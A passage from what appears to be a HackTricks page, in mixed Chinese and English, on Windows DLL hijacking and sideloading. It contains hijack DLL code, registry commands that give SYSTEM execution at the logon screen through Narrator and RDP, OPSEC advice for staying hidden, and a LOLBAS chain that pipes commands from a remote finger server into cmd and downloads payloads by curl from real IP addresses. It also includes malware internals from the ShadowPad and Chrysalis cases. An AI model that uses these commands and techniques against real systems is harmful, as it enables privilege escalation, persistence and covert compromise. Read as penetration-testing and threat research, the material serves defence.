#include<windows.h> #include<stdlib.h> #include<stdio.h>

void Entry (){ //Default function that is executed when the DLL is loaded system(“cmd”); }

BOOL APIENTRY DllMain (HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) { switch (ul_reason_for_call){ case DLL_PROCESS_ATTACH: CreateThread(0,0, (LPTHREAD_START_ROUTINE)Entry,0,0,0); break; case DLL_THREAD_ATTACH: case DLL_THREAD_DETACH: case DLL_PROCESS_DEATCH: break; } return TRUE; }

</details>

## 案例研究：Narrator OneCore TTS Localization DLL Hijack (Accessibility/ATs)

Windows Narrator.exe 在启动时仍会探测一个可预测、与语言相关的本地化 DLL，该 DLL 可被劫持以实现任意代码执行和持久化。

关键要点
- 探测路径（当前版本）：`%windir%\System32\speech_onecore\engines\tts\msttsloc_onecoreenus.dll` (EN-US).
- 旧路径（较旧版本）：`%windir%\System32\speech\engine\tts\msttslocenus.dll`.
- 如果在 OneCore 路径上存在可写的且由攻击者控制的 DLL，则该 DLL 会被加载并执行 `DllMain(DLL_PROCESS_ATTACH)`。不需要任何导出。

通过 Procmon 发现
- 筛选条件：`Process Name is Narrator.exe` and `Operation is Load Image` or `CreateFile`.
- 启动 Narrator 并观察对上述路径的加载尝试。

最小 DLL
```c
// Build as msttsloc_onecoreenus.dll and place in the OneCore TTS path
BOOL WINAPI DllMain(HINSTANCE h, DWORD r, LPVOID) {
if (r == DLL_PROCESS_ATTACH) {
// Optional OPSEC: DisableThreadLibraryCalls(h);
// Suspend/quiet Narrator main thread, then run payload
// (see PoC for implementation details)
}
return TRUE;
}

OPSEC silence

• A naive hijack will speak/highlight UI. 要保持静默，在 attach 时枚举 Narrator 线程，打开主线程 (OpenThread(THREAD_SUSPEND_RESUME)) 并使用 SuspendThread 暂停它；在自己的线程中继续执行。完整代码见 PoC。

Trigger and persistence via Accessibility configuration

• User context (HKCU): reg add "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Accessibility" /v configuration /t REG_SZ /d "Narrator" /f
• Winlogon/SYSTEM (HKLM): reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Accessibility" /v configuration /t REG_SZ /d "Narrator" /f
• 使用上述方法，启动 Narrator 会加载被放置的 DLL。在 secure desktop（登录屏幕）上，按 CTRL+WIN+ENTER 启动 Narrator；你的 DLL 会以 SYSTEM 身份在 secure desktop 上执行。

RDP-triggered SYSTEM execution (lateral movement)

• Allow classic RDP security layer: reg add "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v SecurityLayer /t REG_DWORD /d 0 /f
• RDP 到主机，在登录屏幕按 CTRL+WIN+ENTER 启动 Narrator；你的 DLL 会以 SYSTEM 身份在 secure desktop 上执行。
• Execution stops when the RDP session closes—inject/migrate promptly.

Bring Your Own Accessibility (BYOA)

• 你可以克隆一个内置的 Accessibility Tool (AT) 注册表项（例如 CursorIndicator），编辑它以指向任意二进制/DLL，导入该项，然后将 configuration 设置为该 AT 名称。这样可以在 Accessibility 框架下代理任意执行。

Notes

• 向 %windir%\System32 写入文件并修改 HKLM 值需要 admin 权限。
• 所有 payload 逻辑可以放在 DLL_PROCESS_ATTACH 中；不需要导出函数。

Case Study: CVE-2025-1729 - Privilege Escalation Using TPQMAssistant.exe

This case demonstrates Phantom DLL Hijacking in Lenovo’s TrackPoint Quick Menu (TPQMAssistant.exe), tracked as CVE-2025-1729.

Vulnerability Details

• Component: TPQMAssistant.exe located at C:\ProgramData\Lenovo\TPQM\Assistant\.
• Scheduled Task: Lenovo\TrackPointQuickMenu\Schedule\ActivationDailyScheduleTask runs daily at 9:30 AM under the context of the logged-on user.
• Directory Permissions: Writable by CREATOR OWNER, allowing local users to drop arbitrary files.
• DLL Search Behavior: Attempts to load hostfxr.dll from its working directory first and logs “NAME NOT FOUND” if missing, indicating local directory search precedence.

Exploit Implementation

An attacker can place a malicious hostfxr.dll stub in the same directory, exploiting the missing DLL to achieve code execution under the user’s context:

#include <windows.h>

BOOL APIENTRY DllMain(HMODULE hModule, DWORD fdwReason, LPVOID lpReserved) {
if (fdwReason == DLL_PROCESS_ATTACH) {
// Payload: display a message box (proof-of-concept)
MessageBoxA(NULL, "DLL Hijacked!", "TPQM", MB_OK);
}
return TRUE;
}

攻击流程

1. 作为普通用户，将 hostfxr.dll 放入 C:\ProgramData\Lenovo\TPQM\Assistant\。
2. 等待计划任务在当前用户上下文中于上午 9:30 运行。
3. 如果在任务执行时有管理员登录，恶意 DLL 将在管理员会话中以中等完整性运行。
4. 串联常见的 UAC 绕过技术，将权限从中等完整性提升到 SYSTEM。

案例研究: MSI CustomAction Dropper + DLL Side-Loading via Signed Host (wsc_proxy.exe)

威胁行为者经常将基于 MSI 的 dropper 与 DLL side-loading 配对，以在受信任、已签名的进程下执行 payloads。

Chain overview

• 用户下载 MSI。一个 CustomAction 在 GUI 安装期间静默运行（例如 LaunchApplication 或 VBScript action），从嵌入资源重构下一阶段。
• dropper 将一个合法的已签名 EXE 和一个恶意 DLL 写入同一目录（示例配对：Avast 签名的 wsc_proxy.exe + 攻击者控制的 wsc.dll）。
• 当已签名的 EXE 被启动时，Windows DLL 搜索顺序会优先从工作目录加载 wsc.dll，在已签名的父进程下执行攻击者代码（ATT&CK T1574.001）。

MSI analysis (what to look for)

• CustomAction table:
• 查找运行可执行文件或 VBScript 的条目。可疑示例模式：LaunchApplication 在后台执行嵌入文件。
• 在 Orca (Microsoft Orca.exe) 中，检查 CustomAction、InstallExecuteSequence 和 Binary 表。
• MSI CAB 中的嵌入/分割 payloads:
• 管理提取：msiexec /a package.msi /qb TARGETDIR=C:\out
• 或者使用 lessmsi：lessmsi x package.msi C:\out
• 查找多个小片段，它们会由 VBScript CustomAction 拼接并解密。常见流程：

' VBScript CustomAction (high level)
' 1) Read multiple fragment files from the embedded CAB (e.g., f0.bin, f1.bin, ...)
' 2) Concatenate with ADODB.Stream or FileSystemObject
' 3) Decrypt using a hardcoded password/key
' 4) Write reconstructed PE(s) to disk (e.g., wsc_proxy.exe and wsc.dll)

使用 wsc_proxy.exe 的实用 sideloading

• 将这两个文件放到同一文件夹:
• wsc_proxy.exe: legitimate signed host (Avast). The process attempts to load wsc.dll by name from its directory.
• wsc.dll: attacker DLL. If no specific exports are required, DllMain can suffice; otherwise, build a proxy DLL and forward required exports to the genuine library while running payload in DllMain.
• Build a minimal DLL payload:

// x64: x86_64-w64-mingw32-gcc payload.c -shared -o wsc.dll
#include <windows.h>
BOOL WINAPI DllMain(HINSTANCE h, DWORD r, LPVOID) {
if (r == DLL_PROCESS_ATTACH) {
WinExec("cmd.exe /c whoami > %TEMP%\\wsc_sideload.txt", SW_HIDE);
}
return TRUE;
}

• 对于导出需求，使用代理框架（例如 DLLirant/Spartacus）生成一个转发 DLL，同时执行你的 payload。

• 该技术依赖宿主二进制对 DLL 名称的解析。如果宿主使用绝对路径或安全加载标志（例如 LOAD_LIBRARY_SEARCH_SYSTEM32/SetDefaultDllDirectories），则劫持可能失败。

• KnownDLLs、SxS 和 转发导出 会影响优先级，选择宿主二进制和导出集合时必须考虑这些因素。

签名三件组 + 加密 payloads (ShadowPad case study)

Check Point 描述了 Ink Dragon 如何使用 three-file triad 部署 ShadowPad，以在与合法软件混淆的同时使核心 payload 在磁盘上保持加密：

1. Signed host EXE – 像 AMD、Realtek 或 NVIDIA 等厂商会被滥用（vncutil64.exe、ApplicationLogs.exe、msedge_proxyLog.exe）。攻击者将可执行文件重命名为类似 Windows 的二进制（例如 conhost.exe），但 Authenticode 签名仍然有效。
2. Malicious loader DLL – 放置在 EXE 旁、具有预期名称的 DLL（vncutil64loc.dll、atiadlxy.dll、msedge_proxyLogLOC.dll）。该 DLL 通常为使用 ScatterBrain 框架混淆的 MFC 二进制；其唯一任务是定位加密 blob、解密它并反射式映射 ShadowPad。
3. Encrypted payload blob – 通常以 <name>.tmp 存放在同一目录中。将解密的 payload 内存映射后，loader 会删除 TMP 文件以销毁取证证据。

Tradecraft notes:

• 将已签名的 EXE 重命名（同时在 PE 头中保留原始的 OriginalFileName）可以让它伪装成 Windows 二进制但保留厂商签名，因此可仿效 Ink Dragon 的做法：投放看起来像 conhost.exe 的二进制，实际上是 AMD/NVIDIA 实用程序。
• 由于该可执行文件保持受信任，绝大多数允许列表控制只需要你的恶意 DLL 与之并置即可。重点在于定制 loader DLL；已签名的父程序通常可以不改动地运行。
• ShadowPad 的解密器期望 TMP blob 与 loader 同目录且可写，以便在映射后将文件置零。在 payload 加载之前保持该目录可写；一旦载入内存，TMP 文件为 OPSEC 可安全删除。

LOLBAS stager + staged archive sideloading chain (finger → tar/curl → WMI)

攻击者将 DLL sideloading 与 LOLBAS 配合使用，这样磁盘上唯一的自定义工件就是放在受信任 EXE 旁边的恶意 DLL：

• Remote command loader (Finger): 隐藏的 PowerShell 启动 cmd.exe /c，从 Finger 服务器拉取命令并将其通过管道传给 cmd：

powershell.exe Start-Process cmd -ArgumentList '/c finger Galo@91.193.19.108 | cmd' -WindowStyle Hidden

• finger user@host 从 TCP/79 获取文本；| cmd 执行服务器响应，从而允许攻击者在服务端轮换第二阶段。

• Built-in download/extract: 下载具有良性扩展名的归档，解压它，并在随机的 %LocalAppData% 文件夹下放置 sideload 目标及 DLL：

$base = "$Env:LocalAppData"; $dir = Join-Path $base (Get-Random); curl -s -L -o "$dir.pdf" 79.141.172.212/tcp; mkdir "$dir"; tar -xf "$dir.pdf" -C "$dir"; $exe = "$dir\intelbq.exe"

• curl -s -L 隐藏进度并跟随重定向；tar -xf 使用 Windows 自带的 tar。

• WMI/CIM launch: 通过 WMI 启动 EXE，这样遥测会显示一个由 CIM 创建的进程，同时加载并列的 DLL：

Invoke-CimMethod -ClassName Win32_Process -MethodName Create -Arguments @{CommandLine = "`"$exe`""}

• 适用于偏好本地 DLL 的二进制（例如 intelbq.exe、nearby_share.exe）；payload（例如 Remcos）以受信任的名称运行。

• Hunting: 当 forfiles 同时出现 /p、/m 和 /c 时触发告警；在管理员脚本之外很少见。

Case Study: NSIS dropper + Bitdefender Submission Wizard sideload (Chrysalis)

最近的 Lotus Blossom 入侵滥用可信更新链，投放了一个使用 NSIS 打包的 dropper，该 dropper 分阶段部署了 DLL sideload 并实现了全内存 payload。

Tradecraft flow

• update.exe (NSIS) 创建 %AppData%\Bluetooth，将其标记为 HIDDEN，投放一个重命名的 Bitdefender Submission Wizard BluetoothService.exe、一个恶意的 log.dll 和一个加密 blob BluetoothService，然后启动该 EXE。
• 宿主 EXE 导入 log.dll 并调用 LogInit/LogWrite。LogInit 使用 mmap 加载该 blob；LogWrite 使用自定义基于 LCG 的流（常数 0x19660D / 0x3C6EF35F，密钥材料从先前的哈希派生）对其解密，将缓冲区覆盖为明文 shellcode，释放临时数据，然后跳转执行。
• 为避免使用 IAT，loader 通过对导出名应用哈希（使用 FNV-1a basis 0x811C9DC5 + prime 0x1000193），然后应用 Murmur 风格的 avalanche（0x85EBCA6B）并与加盐的目标哈希比较来解析 API。

Main shellcode (Chrysalis)

• 通过五轮对键 gQ2JR&9; 重复 add/XOR/sub 来解密一个 PE-like 的主模块，然后动态加载 Kernel32.dll → GetProcAddress 完成导入解析。
• 通过对每个字符执行位旋转/XOR 变换在运行时重建 DLL 名称字符串，然后加载 oleaut32、advapi32、shlwapi、user32、wininet、ole32、shell32。
• 使用第二种解析器遍历 PEB → InMemoryOrderModuleList，以 4 字节块并用 Murmur 风格混合解析每个导出表，仅在未找到哈希时回退到 GetProcAddress。

Embedded configuration & C2

• 配置位于投放的 BluetoothService 文件内的 offset 0x30808（大小 0x980），使用 RC4 和密钥 qwhvb^435h&*7 解密，暴露 C2 URL 和 User-Agent。
• Beacons 构建以点分隔的主机概要，在前面加上标签 4Q，然后在通过 HTTPS 的 HttpSendRequestA 之前使用密钥 vAuig34%^325hGV 进行 RC4 加密。响应被 RC4 解密并通过标签开关分发（4T shell，4V 进程执行，4W/4X 文件写入，4Y 读取/外泄，4\\ 卸载，4 驱动器/文件枚举 + 分块传输等）。
• 执行模式由 CLI 参数控制：无参数 = 安装持久化（service/Run 键）指向 -i；-i 以 -k 重启自身；-k 跳过安装并运行 payload。

Alternate loader observed

• 同一次入侵投放了 Tiny C Compiler，并在 C:\ProgramData\USOShared\ 中执行 svchost.exe -nostdlib -run conf.c，旁边放有 libtcc.dll。攻击者提供的 C 源码嵌入了 shellcode，编译并在内存中运行，未以 PE 形式写入磁盘。可使用以下方式复现：

C:\ProgramData\USOShared\tcc.exe -nostdlib -run conf.c

• 这个基于 TCC 的 compile-and-run 阶段在运行时导入了 Wininet.dll，并从一个硬编码的 URL 拉取了第二阶段的 shellcode，提供了一个伪装成编译器运行的灵活 loader。

References

• Red Canary – Intelligence Insights: January 2026
• CVE-2025-1729 - Privilege Escalation Using TPQMAssistant.exe
• Microsoft Store - TPQM Assistant UWP
• https://medium.com/@pranaybafna/tcapt-dll-hijacking-888d181ede8e
• https://cocomelonc.github.io/pentest/2021/09/24/dll-hijacking-1.html
• Check Point Research – Nimbus Manticore Deploys New Malware Targeting Europe
• TrustedSec – Hack-cessibility: When DLL Hijacks Meet Windows Helpers
• PoC – api0cradle/Narrator-dll
• Sysinternals Process Monitor
• Unit 42 – Digital Doppelgangers: Anatomy of Evolving Impersonation Campaigns Distributing Gh0st RAT
• Check Point Research – Inside Ink Dragon: Revealing the Relay Network and Inner Workings of a Stealthy Offensive Operation
• Rapid7 – The Chrysalis Backdoor: A Deep Dive into Lotus Blossom’s toolkit
• 0xdf – HTB Bruno ZipSlip → DLL hijack chain

Tip

学习和实践 AWS 黑客技术：HackTricks Training AWS Red Team Expert (ARTE)
学习和实践 GCP 黑客技术：HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术：HackTricks Training Azure Red Team Expert (AzRTE)

支持 HackTricks

• 查看 订阅计划!
• 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live.
• 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。